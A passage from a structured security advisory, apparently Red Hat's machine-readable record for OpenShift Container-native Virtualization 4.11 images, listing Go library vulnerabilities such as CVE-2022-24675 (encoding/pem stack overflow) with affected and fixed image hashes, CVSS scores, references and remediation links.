"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", }, { cve: "CVE-2022-24675", cwe: { id: "CWE-120", name: "Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')", }, discovery_date: "2022-04-21T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2077688", }, ], notes: [ { category: "description", text: "A buffer overflow flaw was found in Golang's library encoding/pem. This flaw allows an attacker to use a large PEM input (more than 5 MB), causing a stack overflow in Decode, which leads to a loss of availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: encoding/pem: fix stack overflow in Decode", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 7, 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope.\n\nRed Hat Developer Tools - Compilers (go-toolset-1.16-golang & go-toolset-1.17-golang), ships the vulnerable code and affected by this vulnerability.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nRed Hat follows best practice and federal requirements for least privilege, allowing only specific processes to be run with isolated accounts specific to the team and federal platforms that have limited privileges that are only used for a single task. The environment leverages file integrity checks and malicious code protections, such as IPS/IDS and antimalware solutions, to help detect and prevent malicious code that attempts to exploit buffer overflow vulnerabilities. Robust input validation and error-handling mechanisms ensure all user inputs are thoroughly validated, preventing improperly validated inputs from causing system instability, exposing sensitive data, or escalating risks.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-24675", }, { category: "external", summary: "RHBZ#2077688", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2077688", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-24675", url: "https://www.cve.org/CVERecord?id=CVE-2022-24675", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-24675", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-24675", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", url: "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", }, ], release_date: "2022-04-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: encoding/pem: fix stack overflow in Decode", }, { cve: "CVE-2022-24921", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2022-03-16T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", 